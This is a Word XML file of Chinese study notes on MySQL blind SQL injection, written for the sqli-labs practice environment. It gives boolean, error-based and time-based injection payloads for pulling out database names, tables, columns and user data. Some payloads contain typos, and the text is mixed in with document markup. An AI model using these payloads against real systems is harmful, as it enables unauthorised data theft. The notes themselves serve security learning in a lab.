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mysql盲注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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一、SQL注入的基础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当在浏览器输入id值时，sql的语句会变成select .....from users where id=......LIMIT0,1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"http://127.0.0.1/sqli-labs/Less-1/?id=-1会自动转化为select"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http://127.0.0.1/sqli-labs/Less-1/?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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会自动转化为select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....from users where id=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LIMIT0,1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注意：（1）--+或#起注释作用，会将后面的所有语句删除掉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union的作用连接sql语句，若前一条语句为空，则显示后面语句，反之，则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示前面一条语句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注入类型：id=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$id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id=$id   id=(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$id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   id=(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$id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)......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闭合中的数字后面跟与类型无关的字符，将默认转换为前面的数字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sql布尔盲注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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基本使用函数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（1）Mid（）函数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此函数为截取字符串一部分，使用形式：Mid(column_name,start[,length])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default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5420" cy="5033645"/>
            <wp:effectExtent l="0" t="0" r="11430" b="14605"/>
            <wp:docPr id="1" name="图片 1" descr="qq_pic_merged_160034247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6003424743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525" w:left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ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ubstr()函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1050" w:leftChars="500" w:firstLine="0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Substr()和substring()函数实现的功能是一样的，均为截取字符串。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使用形式如下：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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>string substring(string, start, length)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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>string substr(string, start, length)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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数描述同mid()函数，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string为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一个参数为要处理的字符串，start为开始位置，length为截取的长度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="525" w:left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b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Left()函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1261" w:leftChars="500" w:hanging="211" w:hangingChars="10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Left()得到字符串左部指定个数的字符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使用形式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Left ( string, n )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1261" w:leftChars="500" w:hanging="211" w:hangingChars="10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string为要截取的字符串，n为长度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（4）ORD（）函数，此函数为返回的第一个字符串的ascii码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0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如：ORD(MID(DATABASE(),1,1))&gt;114意为检测database（）第一位ascii码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="1054" w:firstLineChars="5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否大于114，也即是“r”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（5）ascii()函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="525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将某个字符转换为ascii码，与ORD函数相似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regexp 正则注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1050" w:leftChars="500" w:firstLine="0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正则注入介绍：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs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t>http://www.cnblogs.com/lcamry/articles/5717442.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs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用法介绍：select user() regexp '^[a-z]';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Explain：正则表达式的用法，user()结果为 root，regexp 为匹配 root 的正则表达式。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第二位可以用 select user() regexp '^ro'来进行。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like匹配注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="-5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和regexp正则注入类似，mysql注入的时候我们可以用like进行匹配</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="-5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用法：select user() like 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ro%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sleep()函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="-5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将程序挂起一段时间 ，n为n秒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if（）语句</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1160" w:leftChars="-50" w:hanging="1265" w:hangingChars="6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判断语句，如果第一个语句正确就执行第二个语句，如果错误就执行第三个语句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length(string)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="-5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字符串的长度，string为要处理的字符串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database()是数据库，table()是数据表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CAST(str AS 目标数据类型）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="-5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将目标str转化为目标数据类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1157" w:leftChars="2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IFNULL(expr1,expr2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1160" w:leftChars="-50" w:hanging="1265" w:hangingChars="6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如果expr1不是null,IFNULL()返回expr1,否则它返回的是expr2，且0x20为空</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="632" w:firstLine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2.做题思路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（1）先爆数据库，如：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length(database()) --+    看当前数据库的长度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left(database(),1) --+    看当前数据库第一个首字母</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="737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再爆数据表，如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1265" w:hanging="1265" w:hangingChars="6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ascii(substr((select table_name for information_schema.tables where tables_schema=database() LIMIT 0,1),1,1))=(&lt;或&gt;)113 --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1265" w:hanging="1265" w:hangingChars="6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以此类推，得出所有表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="737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再判断表中的列名是否有....列,如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1367" w:leftChars="35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1=(select 1 from information_schema.columns where table_name=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users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and column_name regexp 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^username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LIMIT 0,1) --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="737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看表中的列的内容，如；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1367" w:leftChars="35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ORD(MID((select IFNULL(CAST(username AS CHAR),0x20）form security.users order by ip LIMIT 0,1),1,1))=68 --+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基于报错的sql盲注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="836"/>
        </w:tabs>
        <w:ind w:left="42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1.函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="42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Count----------------------用于计数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="42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Floor----------------------取得0或1，进行数据的重复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="42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Group by-------------------对相同数据进行分组（相同的一组）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="4004" w:leftChars="200" w:hanging="3584" w:hangingChars="17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Rand()---------------------一个随机函数，但使用一个固定的随机数种子0后，成为固定的伪随机序列</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="211" w:firstLineChars="1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2.报错类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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（1）平常报错注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1052" w:leftChars="20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union select 1,count(*),concat(0x3a,0x3a,(select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user()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),0x3a,floor(rand(0)*2))a form information_schema.columns group by a--+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1052" w:leftChars="200" w:hanging="632" w:hanging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利用double数值类型超出范围进行报错注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="-1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union select (exp(~(select * from(select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user()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)a))),2,3 --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1052" w:leftChars="20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利用bigint溢出进行报错注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="-1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union select (!(select * from(select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user()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)x) - ~0),2,3 --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1052" w:leftChars="20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xpath函数报错注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="-1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and extractvalue(1,concat(0x7e,(select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@@version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),0x7e)) --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="-1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and updatexml(1,concat(0x7e,(select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@@verson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),0x7e),1) --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1052" w:leftChars="200" w:hanging="632" w:hangingChars="3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利用数据重复性报错注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1055" w:leftChars="-100" w:hanging="1265" w:hangingChars="6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union select 1,2,3 from (select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NAME CONST(version(),1),NAME CONST(version(),1)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)x --+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 xml:space="preserve"> 红色标注的地方是可以爆库，爆表的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基于时间的sql盲注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="632" w:firstLine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1.函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="33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Sleep(N)-------------可以让语句运行N秒</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="3281" w:leftChars="157" w:hanging="2951" w:hangingChars="14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Benchmark()-----------一个mysql的内置函数，主要用来测试一些函数执行速度，且带有两个参数，一个为执行次数，一个是执行函数或表达式 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="632" w:firstLineChars="3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2.延时注入类型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（1）利用sleep()函数进行注入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and if(ascii(substr(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database()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,1,1))=115,1,sleep(5)) --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="632" w:leftChars="0" w:firstLine="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利用benchmark()进行延时注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1052" w:leftChars="300" w:hanging="422" w:hanging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?Id=1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union select (if(subsring(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,1,1)=char(115),benchmark(50000,encode(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MSG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by 5 seconds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)),null)),2,3 from(select database() as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 as tb1 --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="331"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="331" w:lef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A402F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="905A402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F9211CE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AF9211CE"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="737" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="D815A13B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D815A1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54A4C3F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E54A4C3F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FE12CA25"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FE12CA25"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="632" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="077F7A3C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="077F7A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14FFCF6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="114FFC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BFB5D8F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1BFB5D8F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2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628A"/>
    <w:rsid w:val="0BA85312"/>
    <w:rsid w:val="118B19F7"/>
    <w:rsid w:val="64E3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2020-09-16T12:14:00Z</dcterms:created>
  <dc:creator>admin</dc:creator>
  <cp:lastModifiedBy>小成</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-26T20:13:45Z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